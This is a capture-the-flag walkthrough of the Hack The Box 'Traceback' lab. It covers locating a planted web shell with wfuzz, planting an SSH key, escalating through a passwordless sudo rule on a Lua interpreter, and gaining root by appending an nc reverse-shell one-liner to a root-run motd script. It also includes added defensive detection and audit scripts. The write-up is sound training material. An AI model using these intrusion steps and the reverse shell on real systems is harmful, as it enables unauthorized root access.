Hack The Box - Traceback

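Overview

The target is a Linux machine hosting a website that has already been compromised. The attacker left some clues and tools on the server, and we need to use them to obtain root and the flags. First, some social-engineering-style digging turns up information about the attacker, and his GitHub account provides clues about web shells. wfuzz then locates the web shell the attacker uploaded to the target site, and that web shell gives us the privileges of the webadmin account. Clues on the host point to a way of escalating privileges by running a Lua script, which yields a second, more privileged account, sysadmin. Finally, monitoring with pspy reveals scheduled scripts that run with root privileges; modifying one of them to launch a reverse shell gives root.

Information Gathering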

root@vultr:~/htb# nmap -sV -sC 10.10.10.181
Starting Nmap 7.70 ( https://nmap.org ) at 2020-05-28 08:06 UTC
Nmap scan report for 10.10.10.181
Host is up (0.076s latency).
Not shown: 984 closed ports
PORT      STATE    SERVICE        VERSION
22/tcp    open     ssh            OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 96:25:51:8e:6c:83:07:48:ce:11:4b:1f:e5:6d:8a:28 (RSA)
|   256 54:bd:46:71:14:bd:b2:42:a1:b6:b0:2d:94:14:3b:0d (ECDSA)
|_  256 4d:c3:f8:52:b8:85:ec:9c:3e:4d:57:2c:4a:82:fd:86 (ED25519)
80/tcp    open     http           Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Help us
416/tcp   filtered silverplatter
1011/tcp  filtered unknown
1130/tcp  filtered casp
1521/tcp  filtered oracle
2119/tcp  filtered gsigatekeeper
3476/tcp  filtered nppmp
4900/tcp  filtered hfcs
5440/tcp  filtered unknown
5903/tcp  filtered vnc-3
6580/tcp  filtered parsec-master
7741/tcp  filtered scriptview
8292/tcp  filtered blp3
32773/tcp filtered sometimes-rpc9
52869/tcp filtered unknown
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.32 seconds

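Visiting the target website in a browser shows that the page has been defaced. Judging from the message left on the page, Xh4H is probably the attacker's handle (the target site is on port 80; I set up a local mapping).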

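Googling this name leads to the attacker's GitHub account, which contains a project called Web-Shells. The message on the target site says the attacker left some backdoors there, so we simply use the web shell file names from that project as a wordlist and try to brute-force the paths.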

root@vultr:~/htb# cat fuzz.txt
alfa3.php
alfav3.0.1.php
andela.php
bloodsecv4.php
by.php
c99ud.php
cmd.php
configkillerionkros.php
jspshell.jsp
mini.php
obfuscated-punknopass.php
punk-nopass.php
punkholic.php
r57.php
smevk.php
wso2.8.5.php

Brute Forcing

Brute-forcing the paths with wfuzz does indeed find the web shell file the attacker used, smevk.php.

root@vultr:~/htb# wfuzz -w ./fuzz.txt -u http://10.10.10.181/FUZZ --hc 404,403

Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.

********************************************************
* Wfuzz 2.3.4 - The Web Fuzzer                         *
********************************************************

Target: http://10.10.10.181/FUZZ
Total requests: 17

==================================================================
ID   Response   Lines      Word         Chars          Payload
==================================================================

000017:  C=200     44 L      151 W         1113 Ch        ""
000015:  C=200     58 L      100 W         1261 Ch        "smevk.php"

Total time: 0.241917
Processed Requests: 17
Filtered Requests: 15
Requests/sec.: 70.27192
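
Seen from the server side, the run above is a burst of requests for well-known web shell names from one client, with a single 200 among the 404s. The following added example (not part of the original write-up) detects that pattern in an Apache combined-format access log; the log lines, the client addresses and the shortened watchlist are constructed for illustration.

```bash
#!/usr/bin/env bash
# Added example: find clients that enumerate known web-shell file names in an
# Apache combined-format access log, and show which probes were answered 200.

# A few of the names from fuzz.txt above (extend with the full list).
WATCHLIST='alfa3.php c99ud.php cmd.php r57.php smevk.php wso2.8.5.php'

# detect_shell_probes [LOGFILE] [MIN_PROBES]   (LOGFILE "-" or omitted = stdin)
# Prints "IP probes=N hits=PATH[,PATH]" for each client that requested at
# least MIN_PROBES (default 3) distinct watchlisted names.
detect_shell_probes() {
  awk -v names="$WATCHLIST" -v min="${2:-3}" '
    BEGIN { n = split(names, a, " "); for (i = 1; i <= n; i++) watch[a[i]] = 1 }
    {
      ip = $1; path = $7; status = $9
      sub(/\?.*/, "", path)                 # drop the query string
      base = path; sub(/.*\//, "", base)    # keep the file name only
      if (!(base in watch)) next
      if (!((ip, base) in seen)) { seen[ip, base] = 1; probes[ip]++ }
      if (status == 200 && !((ip, path) in hit)) {
        hit[ip, path] = 1
        if (ip in hits) hits[ip] = hits[ip] "," path; else hits[ip] = path
      }
    }
    END {
      for (ip in probes)
        if (probes[ip] >= min)
          printf "%s probes=%d hits=%s\n", ip, probes[ip], ((ip in hits) ? hits[ip] : "-")
    }' "${1:--}" | sort
}

# Constructed sample log; addresses are from the documentation ranges.
sample_log() {
  cat <<'EOF'
192.0.2.10 - - [28/May/2020:08:20:01 +0000] "GET /alfa3.php HTTP/1.1" 404 437 "-" "-"
192.0.2.10 - - [28/May/2020:08:20:01 +0000] "GET /c99ud.php HTTP/1.1" 404 437 "-" "-"
192.0.2.10 - - [28/May/2020:08:20:01 +0000] "GET /cmd.php HTTP/1.1" 404 437 "-" "-"
192.0.2.10 - - [28/May/2020:08:20:01 +0000] "GET /r57.php HTTP/1.1" 404 437 "-" "-"
192.0.2.10 - - [28/May/2020:08:20:01 +0000] "GET /smevk.php HTTP/1.1" 200 1261 "-" "-"
192.0.2.10 - - [28/May/2020:08:21:40 +0000] "POST /smevk.php HTTP/1.1" 200 4096 "-" "-"
198.51.100.7 - - [28/May/2020:08:22:10 +0000] "GET /index.html HTTP/1.1" 200 1113 "-" "-"
198.51.100.7 - - [28/May/2020:08:22:15 +0000] "GET /cmd.php HTTP/1.1" 404 437 "-" "-"
EOF
}

sample_log | detect_shell_probes -
```

A non-empty hits field means a watchlisted file actually exists under the web root and should be treated as a compromise indicator, not just a scan.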

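Opening it in a browser shows a very full-featured web shell, and a quick look shows that the current user is webadmin. To keep the connection stable, we place a public key under /home/webadmin/.ssh and log in from our own machine with the private key.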

First, generate a public/private key pair on the local machine.

root@vultr:~# ssh-keygen -t rsa
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa):
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /root/.ssh/id_rsa.
Your public key has been saved in /root/.ssh/id_rsa.pub.
The key fingerprint is:
SHA256:2YE9x2+Eyr/bU1JkYYAbvgxxVvScvIBB1kV0qBUnWR0 root@vultr.guest
The key's randomart image is:
+---[RSA 2048]----+
|          .+=+BEB|
|         +.*ooOo*|
|        . O.*+.B |
|         = B.o. o|
|        S * . oo |
|           + .. .|
|            .  o |
|             o.  |
|            o... |
+----[SHA256]-----+
root@vultr:~# ls -l /root/.ssh/
total 12
-rw------- 1 root root 1823 May 28 08:39 id_rsa
-rw-r--r-- 1 root root  398 May 28 08:39 id_rsa.pub
-rw-r--r-- 1 root root  666 May 28 03:03 known_hosts

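Copy the contents of the public key file, save them as a file named authorized_keys, and upload it through the web shell directly to /home/webadmin/.ssh. After that we can log in over SSH with the private key.
The home directory holds some clues: note.txt mentions Lua, and .bash_history contains a record of earlier commands that appear to run a privesc.lua script with /home/sysadmin/luvit. After a good deal of searching, however, neither of these two files could be located, and the webadmin account has no permission to read files under sysadmin's directory.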

#################################
-------- OWNED BY XH4H  ---------
- I guess stuff could have been configured better ^^ -
#################################

Welcome to Xh4H land



Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

Last login: Thu May 28 01:48:57 2020 from 10.10.14.101
webadmin@traceback:~$ whoami
webadmin
webadmin@traceback:~$
webadmin@traceback:~$ cat note.txt
- sysadmin -
I have left a tool to practice Lua.
I'm sure you know where to find it.
Contact me if you have any question.
webadmin@traceback:~$ cat .bash_history
ls -la
sudo -l
nano privesc.lua
sudo -u sysadmin /home/sysadmin/luvit privesc.lua
rm privesc.lua
logout

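Privilege Escalation

Running sudo -l shows that the file we were looking for can be run via sudo without a password. Conveniently, just at this moment some other player had created a Lua file in the home directory that spawns bash; its entire content is the single line os.execute("/bin/bash").
Following the hint obtained earlier, running sudo -u sysadmin /home/sysadmin/luvit script.lua drops us straight into a bash shell as sysadmin, and user.txt can be read from sysadmin's home directory.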

webadmin@traceback:~$ sudo -l
Matching Defaults entries for webadmin on traceback:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User webadmin may run the following commands on traceback:
    (sysadmin) NOPASSWD: /home/sysadmin/luvit
webadmin@traceback:~$ sudo -u sysadmin /home/sysadmin/luvit  script.lua
sysadmin@traceback:~$ whoami
sysadmin
sysadmin@traceback:~$ cd ../sysadmin
sysadmin@traceback:/home/sysadmin$ ls -la
total 4336
drwxr-x--- 5 sysadmin sysadmin    4096 Mar 16 03:53 .
drwxr-xr-x 4 root     root        4096 Aug 25  2019 ..
-rw------- 1 sysadmin sysadmin       1 Aug 25  2019 .bash_history
-rw-r--r-- 1 sysadmin sysadmin     220 Apr  4  2018 .bash_logout
-rw-r--r-- 1 sysadmin sysadmin    3771 Apr  4  2018 .bashrc
drwx------ 2 sysadmin sysadmin    4096 Aug 25  2019 .cache
drwxrwxr-x 3 sysadmin sysadmin    4096 Aug 24  2019 .local
-rwxrwxr-x 1 sysadmin sysadmin 4397566 Aug 24  2019 luvit
-rw-r--r-- 1 sysadmin sysadmin     807 Apr  4  2018 .profile
drwxr-xr-x 2 root     root        4096 Aug 25  2019 .ssh
-rw------- 1 sysadmin sysadmin      33 May 28 01:33 user.txt
sysadmin@traceback:/home/sysadmin$
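
The sudo rule above hands a script interpreter stored in a user's home directory to another account with no password prompt. As an added example (not part of the original write-up), this check reads `sudo -l` output and reports NOPASSWD commands that live outside root-owned system directories; the trusted-directory list and the second rule in the sample are assumptions made for illustration.

```bash
#!/usr/bin/env bash
# Added example: review `sudo -l` output for NOPASSWD rules whose command
# lives outside root-owned system directories.

# Directories assumed to be writable by root only (adjust to the host).
TRUSTED_PREFIXES='/bin/ /sbin/ /usr/bin/ /usr/sbin/ /usr/local/bin/ /usr/local/sbin/'

# audit_sudo_rules: reads `sudo -l` output on stdin and prints "RUNAS COMMAND"
# for every NOPASSWD command outside TRUSTED_PREFIXES. "ALL" is reported too,
# since it is not confined to any directory.
audit_sudo_rules() {
  awk -v prefixes="$TRUSTED_PREFIXES" '
    BEGIN { np = split(prefixes, p, " ") }
    /^[ \t]+\(/ {
      match($0, /\([^)]*\)/)
      runas = substr($0, RSTART + 1, RLENGTH - 2)
      rest = substr($0, RSTART + RLENGTH); sub(/^[ \t]+/, "", rest)
      nopass = 0
      nc = split(rest, cmds, /,[ \t]*/)
      for (i = 1; i <= nc; i++) {
        c = cmds[i]
        while (match(c, /^[A-Z_]+:[ \t]*/)) {     # tags persist along the list
          tag = substr(c, 1, RLENGTH)
          if (tag ~ /^NOPASSWD/) nopass = 1
          else if (tag ~ /^PASSWD/) nopass = 0
          c = substr(c, RLENGTH + 1)
        }
        if (!nopass) continue
        split(c, w, " "); bin = w[1]; trusted = 0
        for (j = 1; j <= np; j++) if (index(bin, p[j]) == 1) trusted = 1
        if (!trusted) print runas, bin
      }
    }'
}

# First rule is the one shown in the session above; the second is constructed.
sample_sudo_l() {
  cat <<'EOF'
User webadmin may run the following commands on traceback:
    (sysadmin) NOPASSWD: /home/sysadmin/luvit
    (root) NOPASSWD: /usr/bin/systemctl status apache2, PASSWD: /opt/tools/backup.sh
EOF
}

sample_sudo_l | audit_sudo_rules
```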

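Next we try to obtain root. For this we use pspy to monitor processes; this tool can observe commands executed by other users while running as an ordinary user.
After watching for a while, we see that the target machine runs a cp command every 30 seconds, copying some files from a backup directory to /etc/update-motd.d/.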

/bin/sh -c /bin/cp /var/backups/.update-motd.d/* /etc/update-motd.d/

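Moving into this directory, we find that the content of 00-header is exactly the message displayed at SSH login. In addition, the pspy output shows that an SSH login automatically triggers sh -c uname -a; w; id; /bin/sh -i, which matches this script. We can append a line with id to verify this.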

sysadmin@traceback:~$ cd /etc/update-motd.d/
sysadmin@traceback:/etc/update-motd.d$ cat 00-header
#!/bin/sh
#
#    00-header - create the header of the MOTD
#    Copyright (C) 2009-2010 Canonical Ltd.
#
#    Authors: Dustin Kirkland <kirkland@canonical.com>
#
#    This program is free software; you can redistribute it and/or modify
#    it under the terms of the GNU General Public License as published by
#    the Free Software Foundation; either version 2 of the License, or
#    (at your option) any later version.
#
#    This program is distributed in the hope that it will be useful,
#    but WITHOUT ANY WARRANTY; without even the implied warranty of
#    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
#    GNU General Public License for more details.
#
#    You should have received a copy of the GNU General Public License along
#    with this program; if not, write to the Free Software Foundation, Inc.,
#    51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.

[ -r /etc/lsb-release ] && . /etc/lsb-release


echo "\nWelcome to Xh4H land \n"
id

Finally, we can confirm that an SSH login causes this script to be executed as root, so we add an nc reverse shell here by appending the following to 00-header: rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.94 8888 >/tmp/f

At the same time, start a listener on the local machine with nc -lvp 8888 to receive the root reverse shell.
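
The root step works only because scripts that root executes at login could be edited by the sysadmin account. As an added example (not part of the original write-up), this audit lists files in such a directory that anyone other than the expected owner can modify; it assumes GNU find and stat, and the two directories checked at the end are the ones from the cp command seen in pspy.

```bash
#!/usr/bin/env bash
# Added example: list files (and the directory itself) that an account other
# than the expected owner can modify. Assumes GNU find/stat and paths without
# whitespace, which holds for the usual update-motd.d script names.

# audit_root_scripts DIR [OWNER_UID]     (OWNER_UID defaults to 0, i.e. root)
# Prints "PATH: reason [reason ...]" for every finding, sorted by path.
audit_root_scripts() {
  find "$1" -maxdepth 1 \( -type f -o -type d \) -exec stat -c '%a %u %g %n' {} + |
  awk -v want="${2:-0}" '{
    mode = $1; reason = ""
    g = int(substr(mode, length(mode) - 1, 1))   # group permission digit
    o = int(substr(mode, length(mode), 1))       # other permission digit
    if ($2 != want)     reason = reason " owner-uid=" $2
    if (int(g / 2) % 2) reason = reason " group-writable(gid=" $3 ")"
    if (int(o / 2) % 2) reason = reason " world-writable"
    if (reason != "") print $4 ":" reason
  }' | sort
}

# Both ends of the copy job seen in pspy: a writable source is as bad as a
# writable destination, because root copies one over the other.
for d in /etc/update-motd.d /var/backups/.update-motd.d; do
  if [ -d "$d" ]; then audit_root_scripts "$d"; fi
done
```

Any line of output for these directories means a non-root account can change what root runs at the next SSH login.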